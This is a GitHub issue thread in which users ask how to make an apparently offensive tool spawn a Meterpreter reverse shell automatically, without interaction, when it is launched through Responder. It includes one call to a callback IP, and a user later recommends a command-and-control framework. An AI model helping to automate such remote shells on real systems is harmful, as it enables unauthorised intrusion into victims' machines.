Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Automaticly spawn meterpreter shell without interaction #8

Open
vincentcox opened this issue Jan 27, 2020 · 2 comments
Open

Automaticly spawn meterpreter shell without interaction #8

vincentcox opened this issue Jan 27, 2020 · 2 comments

Comments

@vincentcox
Copy link

What should I modify in the code to automatically spawn a Meterpreter shell? For example if you use responder to launch the executable, only the first computer will be able to spawn a shell. That's why I want to let it spawn immediately to Meterrpreter.

I was thinking to put the following line in the source code (in the main code):

meterpreter.Meterpreter(transport, address)

But it doesn't seem to work.

Also if I try:

meterpreter.Meterpreter("https", "192.168.1.2")

Any idea what I do wrong?

@ZxOxRxO
Copy link

ZxOxRxO commented Apr 16, 2024

What should I modify in the code to automatically spawn a Meterpreter shell? For example if you use responder to launch the executable, only the first computer will be able to spawn a shell. That's why I want to let it spawn immediately to Meterrpreter.

I was thinking to put the following line in the source code (in the main code):

meterpreter.Meterpreter(transport, address)

But it doesn't seem to work.

Also if I try:

meterpreter.Meterpreter("https", "192.168.1.2")

Any idea what I do wrong?

hi
can you resolve this problem ?

can you help me to use it ?

@vincentcox
Copy link
Author

Never got an answer and the last code commits are from 5-6 years ago. I suggest you move on to other github projects which are maintained.

I suggest

https://github.com/its-a-feature/Mythic

https://mythicmeta.github.io/overview/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants